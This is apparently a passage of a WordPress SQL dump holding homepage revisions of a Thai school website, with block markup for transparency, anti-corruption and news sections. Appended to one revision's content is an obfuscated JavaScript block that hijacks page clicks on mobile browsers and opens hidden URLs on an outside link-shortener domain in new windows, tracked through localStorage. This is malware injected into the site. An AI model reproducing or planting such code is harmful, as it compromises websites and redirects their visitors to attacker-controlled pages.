{\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:44:55','2024-07-27 04:44:55','',14,'http://pakhaeng.ssk.in.th/?p=103',0,'revision','',0),
(104,1,'2024-07-27 11:45:36','2024-07-27 04:45:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} 